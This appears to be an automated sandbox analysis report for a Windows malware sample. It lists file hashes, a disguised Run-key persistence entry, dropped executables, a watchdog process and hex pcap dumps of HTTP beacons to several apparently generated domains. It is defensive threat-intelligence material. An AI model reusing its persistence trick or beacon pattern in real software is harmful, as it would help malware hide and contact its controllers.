Analysis Date2015-05-14 03:26:25

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2ed92e4e9218e0e0e41a654199dc0c43 sha1: beb6ae4ca4944dab0b908e1c78fa4c8ea8b6e136 size: 293376
Section.rdata md5: a8a8fcc18a4c91ec617718f279c28b45 sha1: 44f987259ca321b9dfbad69d7e3e940f008ecfd2 size: 34304 md5: 9fef3b804a7ca76e9608e533bb0f8f7f sha1: e85c9feccf70bdff418da369b52c54a18fa1fd5e size: 101376
Timestamp2014-10-30 09:46:12
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AuthIP File Awareness Tablet Provider ➝
C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe

↳ C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\tvvdkozi\kyrtneoxa.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.jh
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe"

Network Details:
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206368 69656673   se..Host: chiefs
0x00000070 (00112)   7570706c 792e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   656f6666 6963652e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206d69 64646c65   se..Host: middle
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207261 74686572   se..Host: rather
0x00000070 (00112)   73757070 6c792e6e 65740d0a 0d0a0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   72737570 706c792e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   726f6666 6963652e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b63   se..Host: thinkc
0x00000070 (00112)   61756768 742e6e65 740d0a0d 0a0d0a

